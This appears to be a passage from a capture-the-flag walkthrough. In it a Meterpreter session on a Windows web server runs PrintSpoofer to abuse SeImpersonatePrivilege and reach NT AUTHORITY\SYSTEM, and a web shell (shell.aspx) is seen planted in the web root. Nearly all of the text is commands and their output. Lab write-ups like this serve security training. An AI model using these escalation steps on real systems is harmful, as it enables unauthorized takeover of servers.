user

root

`eterpreter > getprivs

Enabled Process Privileges

Name

SeAssignPrimaryTokenPrivilege SeAuditPrivilege SeChangeNotifyPrivilege SeCreateGlobalPrivilege SeImpersonatePrivilege SeIncreaseQuotaPrivilege SeIncreaseWorkingSetPrivilege`

`meterpreter > shell

C:\users\bob\desktop>cd c:/inetpub/wwwroot/nt4wrksv cd c:/inetpub/wwwroot/nt4wrksv

c:\inetpub\wwwroot\nt4wrksv>dir dir Volume in drive C has no label. Volume Serial Number is AC3C-5CB5

Directory of c:\inetpub\wwwroot\nt4wrksv

03/17/2024 05:50 PM <DIR> . 03/17/2024 05:50 PM <DIR> .. 07/25/2020 08:15 AM 98 passwords.txt 03/17/2024 05:50 PM 27,136 PrintSpoofer64.exe 03/17/2024 05:45 PM 1,020,190 shell.aspx 3 File(s) 1,047,424 bytes 2 Dir(s) 20,277,039,104 bytes free

c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c powershell.exe PrintSpoofer64.exe -i -c powershell.exe [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami whoami nt authority\system

PS C:\Windows\system32> cd /users/administrator/desktop cd /users/administrator/desktop

PS C:\users\administrator\desktop> dir dir

Directory: C:\\users\\administrator\\desktop

Mode LastWriteTime Length Name


-a---- 7/25/2020 8:25 AM 35 root.txt`